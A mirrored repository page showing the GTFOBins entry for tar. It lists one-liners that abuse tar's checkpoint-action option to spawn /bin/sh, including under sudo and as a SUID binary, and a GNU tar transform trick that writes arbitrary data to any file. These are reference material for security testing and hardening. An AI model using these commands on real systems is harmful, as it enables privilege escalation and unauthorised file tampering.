This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-22 03:24:49 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
42997519e18657c6d08196ee16f80ff18789cb4f
GTFOBins.github.io
/
_gtfobins
/
tar.md
Andrea Cardaci
1a739b4550
Add tar file-write
2018-05-30 00:46:04 +02:00
554 B
Raw
Blame
History
functions
functions
execute-interactive
sudo-enabled
suid-limited
file-write
code
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
code
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
code
./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
description
code
This only works for GNU tar.
LFILE=file_to_write TF=$(mktemp) echo data > "$TF" tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
Reference in New Issue
View Git Blame
Copy Permalink